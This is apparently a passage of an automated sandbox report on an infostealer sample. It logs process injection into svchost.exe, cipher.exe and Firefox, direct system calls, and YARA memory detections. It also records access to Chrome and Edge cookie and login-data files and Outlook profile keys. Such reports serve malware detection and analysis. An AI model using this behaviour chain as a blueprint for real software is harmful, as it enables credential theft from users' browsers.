Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h] 2_2_02F649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_02FFA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h] 2_2_02FC69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] 2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] 2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] 2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] 2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h] 2_2_02FBC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00F581F7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F2A395
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2A364 SetUnhandledExceptionFilter, 0_2_00F2A364

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtOpenKeyEx: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtQueryValueKey: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cipher.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Thread register set: target process: 6408 Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Thread APC queued: target process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3DE008 Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F58C93 LogonUserW, 0_2_00F58C93
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F03B4C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00F04A35
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F64EF5 mouse_event, 0_2_00F64EF5
Source: C:\Users\user\Desktop\PI No 20000814C.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe" Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Process created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00F581F7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F64C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00F64C03
Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: PI No 20000814C.exe, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2886B cpuid 0_2_00F2886B
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F350D7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F42230 GetUserNameW, 0_2_00F42230
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F3418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00F3418A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F04AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: PI No 20000814C.exe Binary or memory string: WIN_81
Source: PI No 20000814C.exe Binary or memory string: WIN_XP
Source: PI No 20000814C.exe Binary or memory string: WIN_XPe
Source: PI No 20000814C.exe Binary or memory string: WIN_VISTA
Source: PI No 20000814C.exe Binary or memory string: WIN_7
Source: PI No 20000814C.exe Binary or memory string: WIN_8
Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F76596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00F76596
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F76A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00F76A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs